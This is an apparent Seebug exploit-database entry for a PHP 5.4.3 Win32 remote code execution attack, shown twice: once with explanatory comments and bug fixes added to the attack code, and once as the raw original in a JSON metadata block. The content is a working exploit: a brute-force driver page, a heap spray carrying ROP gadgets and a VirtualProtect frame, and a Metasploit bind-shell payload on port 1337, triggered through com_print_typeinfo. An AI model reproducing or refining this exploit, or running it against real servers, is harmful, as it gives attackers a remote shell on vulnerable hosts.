ID SSV:72876
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source. The listing below consists of an HTML driver page (offset-brute.html) that requests 0day.php once for each offset 0..299, and the PHP script itself, which heap-sprays a template holding hard-coded ole32.dll / ADVAPI32.dll gadget addresses, a VirtualProtect argument frame and a Metasploit bind-shell payload, then constructs a VARIANT from a raw integer in the sprayed address range and calls com_print_typeinfo() on it.
// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish). The gadget and VirtualProtect addresses in 0day.php are hard-coded for that build's system DLLs (ole32.dll, ADVAPI32.dll), and the 0x048dxxxx spray addresses are found by brute force via offset-brute.html, so the PoC will not work unmodified on other Windows builds, language packs or PHP builds.
===================
offset-brute.html
===================
<html><body>
<title>0day</title>
<center>
<font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br>
<textarea rows=50 cols=50 id="log"></textarea>
</center>
<script>
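// Busy-wait for at least `milliseconds` ms. Used by the driver loop below to
// pace the requests to 0day.php. It spins on the main thread the whole time,
// so nothing else on the page (XHR callbacks, repaints) runs meanwhile; that
// is acceptable only for a throwaway driver page like this one.
// Fix: the original capped the spin at 1e7 iterations, so on a fast host it
// could return before the requested delay had elapsed.
function sleep(milliseconds) {
    var start = new Date().getTime();
    while ((new Date().getTime() - start) <= milliseconds) {
        // spin until the wall clock has advanced past the requested delay
    }
}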
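// Fire-and-forget asynchronous GET of `url`. The response is never read; the
// driver only needs the server-side script to execute once per offset.
// `parameters` is accepted for call-site compatibility but is not used: no
// body is sent and nothing is appended to the query string.
// Returns true once the request has been dispatched, false if no XHR object
// could be created (after showing an alert).
// Fix: the original unconditionally ran `new XMLHttpRequest()` before the
// feature check, so on a browser without it the constructor threw and the
// ActiveX fallback below was unreachable.
function makeRequest(url, parameters) {
    var xmlhttp = null;
    if (window.XMLHttpRequest) {
        xmlhttp = new XMLHttpRequest();
        if (xmlhttp.overrideMimeType) {
            xmlhttp.overrideMimeType('text/xml');
        }
    } else if (window.ActiveXObject) {
        // Legacy IE: try the newer MSXML ProgID first, then the original one.
        var progIds = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP"];
        for (var i = 0; i < progIds.length && !xmlhttp; i++) {
            try { xmlhttp = new ActiveXObject(progIds[i]); } catch (e) {}
        }
    }
    if (!xmlhttp) {
        alert('Giving up :( Cannot create an XMLHTTP instance');
        return false;
    }
    xmlhttp.open("GET", url, true);
    xmlhttp.send(null);
    return true;
}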
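// Driver loop: request 0day.php once for each offset 0..299, logging each
// attempt to the textarea, with a 500 ms busy-wait between requests so the
// server-side script is hit sequentially rather than 300 times at once.
// Because `sleep` blocks the main thread, the whole loop takes ~150 s and the
// textarea is likely not repainted until it finishes.
// Fix: the original stored the element in `test` but then wrote to `log`,
// which only worked because browsers expose id'd elements as window
// properties; the looked-up element is now used explicitly. `offset` is also
// declared instead of being an implicit global.
var test = document.getElementById("log");
for (var offset = 0; offset < 300; offset++) {
    test.value += "Trying offset:" + offset + "\r\n";
    makeRequest("0day.php?offset=" + offset);
    sleep(500);
}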
</script></body></html>
===================
0day.php
===================
<?php
// PoC for the VARIANT/com_print_typeinfo crash described in the header.
// Flow: build a 0x200-byte NOP-filled template, splice gadget addresses, a
// VirtualProtect argument frame and a bind-shell payload into it, replicate
// it 0x4b00 times into several arrays (heap spray), then build a VARIANT from
// a raw integer inside the sprayed range and call com_print_typeinfo() on it.
// Requires PHP's COM extension (VARIANT / com_print_typeinfo) on Win32.
// All addresses are fixed for the XP SP3 build named in the header.
$spray = str_repeat("\x90",0x200);
// Untrusted input: the driver page passes 0..299. The value is used below in
// integer addition without a cast; a non-numeric value is coerced (warning
// or TypeError depending on PHP version). NOTE(review): an (int) cast would
// make that explicit.
$offset=$_GET['offset'];
// Layout note for the substr_replace calls that pass a length of -strlen():
// start = -(strlen - k) resolves to index k, and a negative length equal to
// -strlen resolves to a zero-length replacement, so each such call INSERTS
// 4 bytes at index k and the template grows by 4 bytes (8 insertions below,
// so the final template is 0x220 bytes). Only the calls with an explicit
// positive length overwrite in place.
// index 0x00: 0x775DF0DA # ADD ESP,10 # RETN  [ole32.dll]
$spray = substr_replace($spray, "\xda\xf0\x5d\x77", (strlen($spray))*-1,(strlen($spray))*-1);
// index 0x08: pointer into the spray, 0x048d0030 (+offset)
$spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1);
// index 0x10: 0x7752ae9f (RVA 0x0005ae7f) # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN  [ole32.dll]
$spray = substr_replace($spray, "\x9f\xae\x52\x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1);
// index 0x14: address of VirtualProtect, 0x7c801ad4 (fixed for the tested build)
$spray = substr_replace($spray, "\xd4\x1a\x80\x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1);
// index 0x1c: LPVOID lpAddress = 0x048d0060 (+offset)
$spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1);
// index 0x20: SIZE_T dwSize. The bytes encode 0x00100000 little-endian
// (the original comment said 0x01000000, which does not match the bytes).
$spray = substr_replace($spray, "\x00\x00\x10\x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1);
// index 0x24: DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x40)
$spray = substr_replace($spray, "\x40\x00\x00\x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1);
// index 0x28: __out PDWORD lpflOldProtect = 0x048d0068 (+offset), i.e. a
// writable slot inside the sprayed region
$spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1);
// index 0x18 (overwrite, 4 bytes): 0x77dfe8b4 # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C  [ADVAPI32.dll]
$spray = substr_replace($spray, "\xb4\xe8\xdf\x77", (strlen($spray)-0x18)*-1,4);
// index 0x48 (overwrite, 4 bytes): return address 0x048d0080 (+offset)
$spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4);
// NOTE(review): pack("L") uses the host's byte order; on the targeted x86
// Win32 host that is little-endian, matching the literal-byte entries above.
// pack("V") would pin little-endian explicitly.
// Prefix executed before the payload: "\xbc" imm32 = MOV ESP,0x00c0b00c,
// moving the stack pointer away from the spray before the shellcode runs.
$stacktrack = "\xbc\x0c\xb0\xc0\x00";
// Universal win32 bindshell on port 1337 from metasploit (encoded; the first
// bytes after $stacktrack are the decoder stub). Opaque blob, do not edit.
$shellcode = $stacktrack."\x33\xc9\x83\xe9\xb0".
"\x81\xc4\xd0\xfd\xff\xff".
"\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
"\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
"\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
"\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
"\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
"\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
"\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
"\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
"\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
"\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
"\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
"\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
"\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
"\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
"\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
"\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39".
"\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44".
"\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96".
"\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38".
"\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9".
"\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09".
"\x4e\x33\xe4\x96\xcd\xcc\x32\x69";
// index 0x50 (overwrite, strlen($shellcode) bytes): payload body; it fits
// inside the 0x220-byte template without growing it.
$spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode)));
// Replicate the template 0x4b00 (19200) times: roughly 10 MB per string by
// my count (0x220 * 0x4b00). Five copies are kept alive below, so this may
// exceed a default memory_limit; the author evidently ran with it raised.
$fullspray="";
for($i=0;$i<0x4b00;$i++)
{
$fullspray.=$spray;
}
// Keep several distinct copies referenced so the allocations stay resident
// at different heap addresses (the one-byte suffix forces a separate copy).
$j=array();
$e=array();
$b=array();
$a=array();
$c=array();
array_push($j,$fullspray);
array_push($e,$fullspray."W");
array_push($b,$fullspray."A");
array_push($a,$fullspray."S");
array_push($c,$fullspray."!");
// Trigger: a VARIANT built from a raw integer in the sprayed range (COM
// extension class). Per the author's crash note, com_print_typeinfo ends up
// doing CALL DWORD PTR [EAX+10], i.e. it presumably treats this value as an
// object pointer and dispatches through the sprayed bytes.
$vVar = new VARIANT(0x048d0038+$offset);
// Shoot him
com_print_typeinfo($vVar); //CRASH -> 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10]
// NOTE(review): $arr is never assigned anywhere in this script; this echoes
// an empty string and raises an undefined-variable notice. Only reached if
// the call above did not crash the process.
echo $arr;
// Emits the raw 0x220-byte template as the response body (binary).
echo $spray;
?>
{"lastseen": "2017-11-19T16:10:22", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2017-11-19T16:10:22", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T16:10:22", "rev": 2}, "vulnersScore": 0.2}, "href": "https://www.seebug.org/vuldb/ssvid-72876", "references": [], "enchantments_done": [], "id": "SSV:72876", "title": "PHP 5.4 (5.4.3) Code Execution (Win32)", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 4, "sourceData": "\n // Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)\r\n// Exploit author: 0in (Maksymilian Motyl)\r\n// Email: 0in(dot)email(at)gmail.com\r\n// * Bug with Variant type parsing originally discovered by Condis\r\n// Tested on Windows XP SP3 fully patched (Polish)\r\n\r\n\r\n===================\r\n offset-brute.html\r\n===================\r\n\r\n<html><body>\r\n<title>0day</title>\r\n<center>\r\n<font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br>\r\n<textarea rows=50 cols=50 id="log"></textarea>\r\n</center>\r\n<script>\r\nfunction sleep(milliseconds) {\r\n var start = new Date().getTime();\r\n for (var i = 0; i < 1e7; i++) {\r\n if ((new Date().getTime() - start) > milliseconds){\r\n break;\r\n }\r\n }\r\n}\r\nfunction makeRequest(url, parameters)\r\n{\r\n var xmlhttp = new XMLHttpRequest();\r\n if (window.XMLHttpRequest) {\r\n xmlhttp = new XMLHttpRequest();\r\n if (xmlhttp.overrideMimeType) {\r\n xmlhttp.overrideMimeType('text/xml');\r\n }\r\n } else if (window.ActiveXObject) {\r\n // IE\r\n try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }\r\n catch (e) {\r\n try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }\r\n catch (e) {}\r\n }\r\n }\r\n\r\n if (!xmlhttp) {\r\n alert('Giving up :( Cannot create an XMLHTTP instance');\r\n return false;\r\n 
}\r\n\r\n\txmlhttp.open("GET",url,true);\r\n\txmlhttp.send(null);\r\n return true;\r\n}\r\ntest=document.getElementById("log");\r\nfor(offset=0;offset<300;offset++)\r\n{\r\n\tlog.value+="Trying offset:"+offset+"\\r\\n";\r\n\tmakeRequest("0day.php?offset="+offset);\r\n\tsleep(500);\r\n}\r\n\r\n</script></body></html>\r\n\r\n\r\n\r\n===================\r\n 0day.php\r\n===================\r\n\r\n<?php \r\n\r\n$spray = str_repeat("\\x90",0x200); \r\n$offset=$_GET['offset'];\r\n// 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll] \r\n$spray = substr_replace($spray, "\\xda\\xf0\\x5d\\x77", (strlen($spray))*-1,(strlen($spray))*-1); \r\n// :> 0x048d0030\r\n$spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1); \r\n\r\n//0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll]\r\n$spray = substr_replace($spray, "\\x9f\\xae\\x52\\x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1); \r\n\r\n// Adress of VirtualProtect 0x7c801ad4\r\n$spray = substr_replace($spray, "\\xd4\\x1a\\x80\\x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1);\r\n\r\n// LPVOID lpAddress = 0x048d0060\r\n$spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1);\r\n\r\n// SIZE_T dwSize = 0x01000000 \r\n$spray = substr_replace($spray, "\\x00\\x00\\x10\\x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1);\r\n\r\n// DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0 \r\n$spray = substr_replace($spray, "\\x40\\x00\\x00\\x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1);\r\n// __out PDWORD lpflOldProtect = 0x04300070 | 0x105240000\r\n\r\n// 0x048d0068\r\n$spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1);\r\n\r\n//0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll]\r\n$spray = substr_replace($spray, "\\xb4\\xe8\\xdf\\x77", (strlen($spray)-0x18)*-1,4); \r\n// Ret 
Address = 0x048d0080 \r\n$spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4); \r\n\r\n\r\n\r\n$stacktrack = "\\xbc\\x0c\\xb0\\xc0\\x00"; \r\n// Universal win32 bindshell on port 1337 from metasploit\r\n$shellcode = $stacktrack."\\x33\\xc9\\x83\\xe9\\xb0".\r\n "\\x81\\xc4\\xd0\\xfd\\xff\\xff".\r\n "\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x1d".\r\n "\\xcc\\x32\\x69\\x83\\xeb\\xfc\\xe2\\xf4\\xe1\\xa6\\xd9\\x24\\xf5\\x35\\xcd\\x96".\r\n "\\xe2\\xac\\xb9\\x05\\x39\\xe8\\xb9\\x2c\\x21\\x47\\x4e\\x6c\\x65\\xcd\\xdd\\xe2".\r\n "\\x52\\xd4\\xb9\\x36\\x3d\\xcd\\xd9\\x20\\x96\\xf8\\xb9\\x68\\xf3\\xfd\\xf2\\xf0".\r\n "\\xb1\\x48\\xf2\\x1d\\x1a\\x0d\\xf8\\x64\\x1c\\x0e\\xd9\\x9d\\x26\\x98\\x16\\x41".\r\n "\\x68\\x29\\xb9\\x36\\x39\\xcd\\xd9\\x0f\\x96\\xc0\\x79\\xe2\\x42\\xd0\\x33\\x82".\r\n "\\x1e\\xe0\\xb9\\xe0\\x71\\xe8\\x2e\\x08\\xde\\xfd\\xe9\\x0d\\x96\\x8f\\x02\\xe2".\r\n "\\x5d\\xc0\\xb9\\x19\\x01\\x61\\xb9\\x29\\x15\\x92\\x5a\\xe7\\x53\\xc2\\xde\\x39".\r\n "\\xe2\\x1a\\x54\\x3a\\x7b\\xa4\\x01\\x5b\\x75\\xbb\\x41\\x5b\\x42\\x98\\xcd\\xb9".\r\n "\\x75\\x07\\xdf\\x95\\x26\\x9c\\xcd\\xbf\\x42\\x45\\xd7\\x0f\\x9c\\x21\\x3a\\x6b".\r\n "\\x48\\xa6\\x30\\x96\\xcd\\xa4\\xeb\\x60\\xe8\\x61\\x65\\x96\\xcb\\x9f\\x61\\x3a".\r\n "\\x4e\\x9f\\x71\\x3a\\x5e\\x9f\\xcd\\xb9\\x7b\\xa4\\x37\\x50\\x7b\\x9f\\xbb\\x88".\r\n "\\x88\\xa4\\x96\\x73\\x6d\\x0b\\x65\\x96\\xcb\\xa6\\x22\\x38\\x48\\x33\\xe2\\x01".\r\n "\\xb9\\x61\\x1c\\x80\\x4a\\x33\\xe4\\x3a\\x48\\x33\\xe2\\x01\\xf8\\x85\\xb4\\x20".\r\n "\\x4a\\x33\\xe4\\x39\\x49\\x98\\x67\\x96\\xcd\\x5f\\x5a\\x8e\\x64\\x0a\\x4b\\x3e".\r\n "\\xe2\\x1a\\x67\\x96\\xcd\\xaa\\x58\\x0d\\x7b\\xa4\\x51\\x04\\x94\\x29\\x58\\x39".\r\n "\\x44\\xe5\\xfe\\xe0\\xfa\\xa6\\x76\\xe0\\xff\\xfd\\xf2\\x9a\\xb7\\x32\\x70\\x44".\r\n "\\xe3\\x8e\\x1e\\xfa\\x90\\xb6\\x0a\\xc2\\xb6\\x67\\x5a\\x1b\\xe3\\x7f\\x24\\x96".\r\n "\\x68\\x88\\xcd\\xbf\\x46\\x9b\\x60\\x38\\x4c\\x9d\\x58\\x68\\x4c\\x9d\\x67\\x38".\r\n 
"\\xe2\\x1c\\x5a\\xc4\\xc4\\xc9\\xfc\\x3a\\xe2\\x1a\\x58\\x96\\xe2\\xfb\\xcd\\xb9".\r\n "\\x96\\x9b\\xce\\xea\\xd9\\xa8\\xcd\\xbf\\x4f\\x33\\xe2\\x01\\xf2\\x02\\xd2\\x09".\r\n "\\x4e\\x33\\xe4\\x96\\xcd\\xcc\\x32\\x69";\r\n\r\n\r\n$spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode))); \r\n$fullspray="";\r\nfor($i=0;$i<0x4b00;$i++)\r\n{\r\n\t$fullspray.=$spray;\r\n}\r\n$j=array();\r\n$e=array();\r\n$b=array();\r\n$a=array();\r\n$c=array();\r\n\r\narray_push($j,$fullspray);\r\narray_push($e,$fullspray."W");\r\narray_push($b,$fullspray."A");\r\narray_push($a,$fullspray."S");\r\narray_push($c,$fullspray."!");\r\n\r\n\r\n$vVar = new VARIANT(0x048d0038+$offset); \r\n// Shoot him\r\ncom_print_typeinfo($vVar); //CRASH -> 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10]\r\n\r\necho $arr;\r\n\r\necho $spray;\r\n\r\n?>\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-72876", "type": "seebug", "immutableFields": []}
{}